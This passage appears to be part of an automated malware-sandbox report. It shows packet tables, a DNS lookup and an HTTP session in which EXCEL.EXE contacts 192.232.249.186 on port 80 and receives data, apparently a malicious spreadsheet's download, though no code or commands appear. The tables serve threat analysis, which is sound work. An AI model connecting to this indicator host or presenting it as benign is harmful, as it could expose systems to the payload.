Apr 6, 2021 21:02:59.807019949 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.807049990 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.807089090 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.807125092 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.807157993 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.807180882 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.807185888 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.807221889 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.807224035 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.807261944 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.807266951 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.807296038 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.807301998 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.807339907 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.807357073 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.816087961 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992163897 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992301941 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992341995 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992351055 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992372036 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992388010 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992424965 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992439985 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992448092 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992463112 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992499113 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992503881 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992548943 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992556095 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992590904 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992620945 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992628098 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992660046 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992666960 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992705107 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992706060 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992741108 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992741108 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992779016 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992785931 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992815018 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992844105 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992862940 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992887974 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992904902 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992930889 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992942095 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.992973089 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.992980003 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.993019104 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.993021965 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.993073940 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.997370958 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.177957058 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.178039074 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.178066969 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.178098917 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.178247929 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186172009 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186216116 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186253071 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186290026 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186299086 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186326027 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186352968 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186364889 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186388969 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186403036 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186450958 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186492920 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186528921 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186563969 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186568975 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186575890 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186583996 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186589956 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186605930 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186641932 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186666965 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186678886 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186681032 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186718941 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186729908 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186747074 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186767101 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186783075 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186808109 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186836004 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186846018 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186858892 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186883926 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186911106 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 6, 2021 21:02:58.993803978 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 6, 2021 21:02:59.039887905 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 6, 2021 21:02:58.993803978 CEST | 192.168.2.22 | 8.8.8.8 | 0xfc39 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 6, 2021 21:02:59.039887905 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc39 | No error (0) | 192.232.249.186 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 192.232.249.186 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 6, 2021 21:02:59.245107889 CEST | 0 | OUT | |
Apr 6, 2021 21:02:59.806935072 CEST | 2 | IN |